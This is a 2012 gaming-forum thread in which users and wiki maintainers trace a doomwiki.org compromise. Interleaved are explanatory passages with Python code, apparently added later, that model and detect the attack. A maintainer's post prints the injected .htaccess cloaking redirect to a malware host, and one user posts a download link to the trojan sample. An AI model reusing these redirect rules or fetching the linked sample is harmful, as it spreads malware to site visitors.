betabox Posted March 5, 2012

Can someone confirm if doomwiki.org is infected? Yesterday I went to it via Google and noticed a sort of redirection to "bankingonbankers", and Java was started up. Did a malware scan as a follow-up. I tried to reproduce it, but couldn't. However, some guys from a tech support IRC said that when they went to doomwiki.org there was an attempted download of some google_org_doomwiki.zip. VirusTotal indicates it's malware. Maybe there's some malicious script?
petePESTILENCE Posted March 5, 2012

You really should run a scan and then check for the same result on other PCs before you start scaring people. I was on the wiki only yesterday and I found nothing :/
Maes Posted March 5, 2012

Upgrade your Java JRE: there's a recent well-known vulnerability that enables arbitrary code execution through a malicious Java applet. If you see Java starting for no obvious reason on a page that SHOULDN'T have it at all, shut down the browser and kill the Java process ASAP. I know for sure it affects releases prior to 1.6u29, while 1.7 should be fine. On the bright side, this method is only used to deliver .exe files, so on Linux, even if the download succeeds, it will be asymptomatic.
GreyGhost Posted March 5, 2012

Where was I before the forums crashed - better not be anything to do with your malware! (JK)

That's not doomwiki.org, it's a fake link. The one I tried (which should have taken me here) is actually a download link for a file called "google_doomwiki.zip" from californiagoldbook.com and contained a variant of the Win32/Kryptic.ZWP trojan (as reported by ESET Smart Security). Californiagoldbook.com redirects to another site called banknews.com, who are flogging an e-book on a third site called californiagoldbookonline.com. I wouldn't be surprised if that e-book's infested with malware. The moral of the story is - don't take Google links at face value.
EarthQuake Posted March 5, 2012

I too got a suspicious zip file when trying to follow a link to the wiki from Google. The file downloaded was "google_.zip" and contained a "google_.com". Obviously I didn't run the program, but when I clicked the URL again, it took me straight to the site. Nothing weird happened with Java though... Here is the link to the file I downloaded, if anyone wants to examine it. Please be cautious: http://speedy.sh/tuYKn/google.zip
betabox Posted March 5, 2012

petePESTILENCE said:
    You really should run a scan and then check for the same result on other PCs before you start scaring people. I was on the wiki only yesterday and I found nothing :/

Hi there! Good to see you didn't read my post. I already did scans of my PC and I've asked at a tech support IRC about this. Other people have encountered similar threats there. And no, much to your relief, this isn't a scare tactic.

Is the fake link displayed at the bottom of (whichever) browser when you hover the cursor over it on Google? Or does it redirect AFTER clicking on the Google result?

Anyway, it seems my Java version is up to date, but it's not 1.7; unless 1.6u31 is AKA 1.7.
petePESTILENCE Posted March 5, 2012

Soz man.... Just struck me as odd.... Damn Trojan tricksters.
gravager Posted March 5, 2012

I clicked a couple of Google links to the wiki earlier when the thread was new and didn't have any problems. Just tried it again and got the same malicious redirect as you from two different ones, shut down by my browser and antivirus (though I'm gonna do some scans and monitor my processes/network activity closely), but afterwards the links worked properly.

edit: I was in a hurry to sever my connection and make double sure my comp is clean. Posted about things I should probably research first.
RestlessRodent Posted March 5, 2012

Did not occur to me at all, no matter how many times I tried. Some info on that google_.com:

    google_.com: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
    * Written with Microsoft Visual C++ 8.0, using C++/CLI.
    * It is a GUI application.
    * Calls DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindResourceA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetACP, GetCommandLineA, GetCommandLineW, GetCPInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStrings, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemTimeAsFileTime, GetTickCount, GetVersionExA, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSection, InterlockedDecrement, InterlockedIncrement, IsDebuggerPresent, IsValidCodePage, LCMapStringA, LCMapStringW, LeaveCriticalSection, LoadLibraryA, LoadResource, MultiByteToWideChar, QueryPerformanceCounter, RtlUnwind, SetHandleCount, SetLastError, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, WideCharToMultiByte, and WriteFile
gravager Posted March 5, 2012

Could this be due to a compromised .htaccess file at the doomwiki? That's probably the leading cause of traffic inbound from a search engine being redirected to some circle of hell... but web design and security is mostly voodoo to me, I just work on PCs.
TomoAlien Posted March 5, 2012

Well, it only happens when you click on the link to doomwiki.org on Google, and it only happens once. And I guess gravager is right. Whoever is the admin at doomwiki.org should do a check on the .htaccess, since it does that odd redirect.
printz Posted March 5, 2012

I've done a Google search on "doom wiki", scrolled down until I found doomwiki.org and not doom.wikia.com, clicked on the link, nothing special happened.

EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid.
gravager Posted March 5, 2012

Well, I saw it happen twice, and neither of them was the home page link. One of those pop.- links did it to me (I specifically tried it because it looked suspicious), but if I type the URL into my browser it loads the wiki page. I dunno what that prefix is all about. I avoided the crummy wikia site as well.

EDIT: OK, my pop link didn't end with .info; now that smells like a fake. But typing pop.doomwiki.org in a browser just drops the pop and loads the home page for me. Anyway, I sent a PM to Quasar earlier. Not that I know anyone here, but the wiki said he's a maintainer of the server =) He's probably sleeping like normal people though, so if somebody's in direct contact with an admin.... And I guess we can stop testing links to see if we get infected or not. Enough lemmings have taken that dive to confirm the rocks down there are nasty.
GreyGhost Posted March 5, 2012

gravager said:
    Could this be due to a compromised .htaccess file at the doomwiki?

Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.

printz said:
    EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid.

The Google link I used has disappeared, so maybe it's already being filtered out as a known malware site.
printz Posted March 5, 2012

GreyGhost said:
    Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.

Maybe your link didn't have a &redirect=no clause in the URL... I'm getting a pop.doomwiki result in the fifth find entry.
gravager Posted March 5, 2012

Well, this is just really confusing. If there are fake links, they're really good. If I google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms.

More experimenting: it does this exactly once, then it keeps bringing me to doomwiki. But I restart my browser (clears all my cookies and cache) and it happens again. I've got hella slow internet, so I took time to read the messages in the status bar. Instead of "sending request to doomwiki.org" it redirects to "sending request to ####.kingoftheaquarium.com", that's 4 varying numbers up front. Stopped loading before I received enough data to set off my antivirus. I close the tab and open the same link again, and it takes me to Doomwiki. So I'm still thinking it could be the htaccess thing.
Gez Posted March 5, 2012

Looks to me like it's Google that's infected. The way it operates, when you click a link, it actually sends you to a redirect. That way, it can count clicks and know which sites are accessed from which queries, and which type of searches you make, and all the rest of the Big Brotherian stuff. Then it uses JavaScript to hide the actual links in the status bar, and replace them with where they then redirect you. For example, this:

    DoomWiki.org, the new home of the Doom Wiki - Doom, Heretic ...
    Welcome to the ultimate Doom Wiki, a community-driven project to document everything related to id Software's classic games Doom and Doom II, as well as ...
    doomwiki.org/ - Cached - Similar

The link says http://doomwiki.org/ when you hover over it. If you look at the source of the page, however, you'll see something different:

    <li class="g">
      <h3 class="r">
        <a href="/url?q=http://doomwiki.org/&sa=U&ei=LoRUT_GnM8HW0QXpw7jXBw&ved=0CBAQFjAA&usg=AFQjCNFPoLR3C0p93WAu3Vxjfe5NuTveVw">
          <b>DoomWiki</b>.<b>org</b>, the new home of the Doom Wiki - Doom, Heretic <b>...</b>
        </a>
      </h3>
      <div class="s">Welcome to the ultimate <b>Doom Wiki</b>, a community-driven project to document <br>
        everything related to id Software's classic games Doom and Doom II, as well as <b>...</b><br>
        <div>
          <cite><b>doomwiki</b>.<b>org</b>/</cite>
          <span class="flc"> - <a href="//webcache.googleusercontent.com/search?sclient=psy-ab&hl=en&site=&btnK=&q=cache:Q8jS6IXZ_6UJ:http://doomwiki.org/+doomwiki.org&ct=clnk">Cached</a> - <a href="/search?sclient=psy-ab&hl=en&site=&btnK=&tbo=1&q=related:http://doomwiki.org/+doomwiki.org&sa=X">Similar</a>
          </span>
        </div>
      </div>
    </li>
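The mechanism Gez describes (the anchor's real href is a `/url?q=...` redirector, while the visible `<cite>` and status bar show the clean URL) can be checked mechanically. The following is an added example, not code from the post or from Google: it parses result markup of the shape quoted above, unwraps the redirector and reports whether the host a click will actually land on matches the host the result displays. The class names it keys on (`li.g`, `h3.r`, `cite`) are taken from the quoted source; the second entry in the sample page is constructed to show a mismatch and is not a real result.

```python
"""Recover the real target behind a Google result link.

Added example, not from the post. ResultParser pulls each result's anchor
href and the URL shown in <cite>; real_target() unwraps the /url?q=...
redirector so the two can be compared host against host.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


class ResultParser(HTMLParser):
    """Collect (href, displayed cite text) for every <li class="g"> result.
    Relies on the class names seen in the quoted markup (h3.r, li.g, cite)."""

    def __init__(self):
        super().__init__()
        self.results = []
        self._in_title = False
        self._in_cite = False
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "h3" and a.get("class") == "r":
            self._in_title = True
        elif tag == "a" and self._in_title and self._cur is None:
            self._cur = {"href": a.get("href", ""), "cite": ""}
        elif tag == "cite" and self._cur is not None:
            self._in_cite = True

    def handle_endtag(self, tag):
        if tag == "h3":
            self._in_title = False
        elif tag == "cite":
            self._in_cite = False
        elif tag == "li" and self._cur is not None:
            self.results.append(self._cur)
            self._cur = None

    def handle_data(self, data):
        # <cite> text is split across <b> children, so accumulate it.
        if self._in_cite and self._cur is not None:
            self._cur["cite"] += data


def real_target(href):
    """Unwrap Google's /url?q=<target>&... redirector; other hrefs pass through."""
    parts = urlsplit(href)
    if parts.path == "/url":
        q = parse_qs(parts.query).get("q")
        if q:
            return q[0]
    return href


def check_results(html):
    """For each result, compare the host of the displayed URL with the host
    the click will actually land on after the redirector."""
    parser = ResultParser()
    parser.feed(html)
    report = []
    for r in parser.results:
        shown = r["cite"].strip()
        shown_url = shown if "://" in shown else "http://" + shown
        target = real_target(r["href"])
        report.append({
            "shown": shown,
            "target": target,
            "host_matches": urlsplit(target).hostname == urlsplit(shown_url).hostname,
        })
    return report


# Constructed results page. The first entry is the markup quoted above (with
# the attribute ampersands escaped as they are in real HTML source); the second
# is made up for this example, using the pop.doomwiki.info hostname that was
# reported in the thread, so that displayed URL and real target disagree.
SAMPLE_RESULTS = """
<li class="g">
  <h3 class="r"><a href="/url?q=http://doomwiki.org/&amp;sa=U&amp;ei=LoRUT_GnM8HW0QXpw7jXBw&amp;ved=0CBAQFjAA&amp;usg=AFQjCNFPoLR3C0p93WAu3Vxjfe5NuTveVw"><b>DoomWiki</b>.<b>org</b>, the new home of the Doom Wiki</a></h3>
  <div class="s">Welcome to the ultimate <b>Doom Wiki</b> ...<br>
    <div><cite><b>doomwiki</b>.<b>org</b>/</cite>
      <span class="flc"> - <a href="/search?q=related:http://doomwiki.org/">Similar</a></span>
    </div>
  </div>
</li>
<li class="g">
  <h3 class="r"><a href="/url?q=http://pop.doomwiki.info/wiki/Doom&amp;sa=U">Doom - DoomWiki</a></h3>
  <div class="s"><div><cite>doomwiki.org/wiki/Doom</cite></div></div>
</li>
"""

if __name__ == "__main__":
    for entry in check_results(SAMPLE_RESULTS):
        print(entry)
```

For the quoted doomwiki.org entry the redirector unwraps to the same host the result displays, which is consistent with what several posters saw: the link itself was genuine, and the redirect happened after the click landed on the wiki.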
GreyGhost Posted March 5, 2012

You may be right.

gravager said:
    If I google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms. More experimenting: it does this exactly once, then it keeps bringing me to doomwiki. But I restart my browser (clears all my cookies and cache) and it happens again.

Oddly enough, the first time I click on any Google link to DoomWiki (after clearing the browser cache and history) I'm taken to the browser's default home page. Not sure what's going on there. Fortunately I took a screenshot first time around when ESET flagged the trojan, so maybe someone here can make more sense of the object URL than I have.
printz Posted March 5, 2012

Gez said:
    Looks to me like it's Google that's infected.

Did someone hack Google? Was it a protest?

EDIT: Does anyone know what malware files are automatically downloaded? I want to see if I have been infected.
GreyGhost Posted March 5, 2012

Most likely the Russian Mafia seeking to grow their botnets, or Google have unofficially turned evil.
Maes Posted March 5, 2012

Gez said:
    If you look at the source of the page

Soon that will be criminalized in one way or another.
Porsche Monty Posted March 5, 2012

Maes said:
    Soon that will be criminalized in one way or another.

No chance, but I'm guessing someone will figure out an efficient way to obscure it.
Quasar Posted March 5, 2012

It's the DoomWiki that has been infected, and it has most likely happened because we are still stuck on the obsolete 1.16.2 version of MediaWiki, which is known to have at least one serious exploit. This code has been injected into the .htaccess file, after about 300 pages of linebreaks:

    <IfModule prefork.c>
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.$
    RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
    RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
    RewriteCond %{HTTP_COOKIE} !^.*xjV.*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
    RewriteCond %{HTTPS} ^off$
    RewriteRule ^(.*)$ http://%{REMOTE_PORT}.kingoftheaquarium.com/url?sa=X&source=web&cd=20&ved=0oHmRGpyT&url=ht$
    </IfModule>
    #1966ab4f167aa00d6a7a832bb0e5bacd5111a101acd601af7f78bde9
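The quoted rules are a cloaking redirect: they fire only for a plain-HTTP GET whose referrer is a search engine or social site, whose user agent contains "Windows" but none of the listed crawler, fetch-tool or non-Windows strings, that is not for a static asset, and that carries no cookie containing "xjV". The substitution uses `%{REMOTE_PORT}` as a subdomain, which is the varying numeric prefix seen in the status bar. That explains the observations earlier in the thread: a typed URL has no search-engine referrer, crawlers and Linux or Mac browsers are excluded, and a browser that has been hit once carries the marker cookie until it is cleared. The following is an added example, not code from the wiki or from the attacker. It re-implements the visible conditions as a Python predicate over a request dict (a shape chosen for this example, with a representative subset of the user-agent list and a simplified static-file test), and goes a step beyond the post with a small scanner that flags the two tell-tale features of this injection in an .htaccess file: content hidden after a long run of blank lines (the threshold of 50 is an assumption) and a RewriteRule whose target is an off-site host. The user-agent strings and the sample .htaccess are constructed; the sample includes a trimmed copy of the quoted block.

```python
"""Model of the cloaking rules in the .htaccess injection quoted above.

Added example, not code from the wiki or from the attacker. redirect_target()
re-implements the visible RewriteCond logic as a predicate; scan_htaccess()
flags hidden-after-whitespace content and off-site RewriteRule targets.
"""
import re

# Host the injected RewriteRule sends victims to. %{REMOTE_PORT} becomes the
# numeric subdomain, which is why the status bar showed "####." in front of it.
REDIRECT_HOST = "kingoftheaquarium.com"

# Referrer test from the quoted rule (its list is cut off after "bing\." in
# the post, so only the visible alternatives are reproduced).
REFERER_RE = re.compile(
    r"^(http://)?([^/?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.)",
    re.I)

# Representative subset of the user-agent exclusion list (crawlers, fetch
# tools, non-Windows platforms, pre-NT5 Windows). The real list is much longer.
UA_EXCLUDE = (
    "bot", "crawl", "spider", "curl", "wget", "libwww", "python", "perl",
    "google", "yahoo", "yandex", "slurp", "feed", "rss", "validator",
    "linux", "macintosh", "mac os", "mac_powerpc", "iphone", "nokia",
    "freebsd", "openbsd", "netbsd", "sunos", "windows 95", "windows 98",
    "windows ce", "windows nt 4", "win95", "win98", "win16")

# Simplified form of the REQUEST_FILENAME exclusion (static assets).
STATIC_RE = re.compile(r".*\.(jpg|jpeg|gif|png|mpg|avi|zip|gz|tar|ico)$", re.I)


def redirect_target(req):
    """Return the URL the injected rule redirects `req` to, or None.

    `req` is a dict (shape chosen for this example) with the fields the
    RewriteConds read: method, referer, user_agent, filename, cookie, https
    and remote_port.
    """
    ua = req.get("user_agent", "").lower()
    referer = req.get("referer", "")
    if req.get("method") != "GET":
        return None
    if not REFERER_RE.match(referer):
        return None            # typed URLs and bookmarks carry no matching referrer
    if "imgres?q" in referer:
        return None            # image-search clicks are skipped
    if any(tok in ua for tok in UA_EXCLUDE):
        return None            # crawlers and non-Windows clients see the real site
    if STATIC_RE.match(req.get("filename", "")):
        return None
    if "xjV" in req.get("cookie", ""):
        return None            # marker cookie: each browser is hit once
    if "windows" not in ua:
        return None
    if req.get("https"):
        return None
    # The query string of the quoted rule is truncated in the post, so only
    # the host part of the redirect is reconstructed here.
    return "http://%d.%s/" % (req["remote_port"], REDIRECT_HOST)


def google_click(user_agent, **overrides):
    """Constructed request: a click on a Google result, arriving on port 52314."""
    req = {"method": "GET", "referer": "http://www.google.com/search?q=doomwiki",
           "user_agent": user_agent, "filename": "/wiki/Entryway",
           "cookie": "", "https": False, "remote_port": 52314}
    req.update(overrides)
    return req


# Constructed user-agent strings.
CHROME_WIN = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
FIREFOX_LINUX = "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def scan_htaccess(text, allowed_hosts=(), min_blank_run=50):
    """Flag content hidden after a run of blank lines, RewriteRule targets on
    hosts outside `allowed_hosts`, and referrer/cookie-keyed RewriteConds."""
    findings = []
    blank = 0
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s:
            blank += 1
            continue
        if blank >= min_blank_run:
            findings.append("line %d: content resumes after %d blank lines" % (n, blank))
        blank = 0
        m = re.match(r"RewriteRule\s+\S+\s+(\S+)", s)
        if m:
            host = re.match(r"https?://([^/]+)", m.group(1))
            if host and not any(host.group(1).endswith(h) for h in allowed_hosts):
                findings.append("line %d: RewriteRule redirects to external host %s" % (n, host.group(1)))
        if re.match(r"RewriteCond\s+%\{HTTP_COOKIE\}", s):
            findings.append("line %d: RewriteCond keyed on HTTP_COOKIE (once-per-browser cloaking)" % n)
        if re.match(r"RewriteCond\s+%\{HTTP_REFERER\}", s) and re.search(r"google|yahoo|bing", s, re.I):
            findings.append("line %d: RewriteCond keyed on search-engine referrer" % n)
    return findings


# Constructed .htaccess: one legitimate rule, 300 blank lines, then a trimmed
# copy of the quoted injection.
SAMPLE_HTACCESS = "\n".join(
    ["RewriteEngine On",
     "RewriteRule ^wiki/(.*)$ /w/index.php?title=$1 [L,QSA]"]
    + [""] * 300
    + ["<IfModule prefork.c>",
       "RewriteEngine On",
       "RewriteCond %{REQUEST_METHOD} ^GET$",
       r"RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.) [NC]",
       "RewriteCond %{HTTP_COOKIE} !^.*xjV.*$ [NC]",
       "RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]",
       "RewriteRule ^(.*)$ http://%{REMOTE_PORT}.kingoftheaquarium.com/url?sa=X [R,L]",
       "</IfModule>",
       "#1966ab4f167aa00d6a7a832bb0e5bacd5111a101acd601af7f78bde9"])


if __name__ == "__main__":
    print(redirect_target(google_click(CHROME_WIN)))                  # http://52314.kingoftheaquarium.com/
    print(redirect_target(google_click(CHROME_WIN, cookie="xjV=1")))  # None
    print(redirect_target(google_click(FIREFOX_LINUX)))               # None
    print(redirect_target(google_click(GOOGLEBOT)))                   # None
    for finding in scan_htaccess(SAMPLE_HTACCESS, allowed_hosts=("doomwiki.org",)):
        print(finding)
```

Two practical consequences follow from the predicate. Testing for this kind of infection from a shell or from a crawler will not reproduce it: the request must look like a Windows browser arriving from a search result, over plain HTTP, without the marker cookie. And when cleaning up, a scan of the file for whitespace padding and off-site rewrite targets catches this injection even if the attacker changes the domain.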
gravager Posted March 5, 2012

Boom! The old linebreak zerg trick. Anyway, speaking of Google exploits, I read yesterday they were handing out $20-60k prizes for anyone who can mess with Chrome. I thought that could have backfired somehow... getting attention from the wrong people, etc.
printz Posted March 5, 2012

Good to know the problem source has been narrowed.
NiTROACTiVE Posted March 5, 2012

I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rogue anti-virus would get on my computer, but I got it removed. So yeah, whenever something comes up as a threat, I use a program to scan for any threats and remove them.
hex11 Posted March 5, 2012

Why even bother at all with all this fancy-schmancy Java(Script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way.
Manc Posted March 5, 2012

NitroactiveStudios said:
    I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rogue anti-virus would get on my computer, but I got it removed.

There are no ads on doomwiki.org. The mess has been cleaned up, we're updating the source base and developing an action plan to prevent this from happening in the future.
Quasar Posted March 5, 2012

hex11 said:
    Why even bother at all with all this fancy-schmancy Java(Script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way.

Tell me when you write a MediaWiki replacement that runs without any server-side scripting or server-side database, and is served off a vaporware web server that doesn't have server-side configuration files...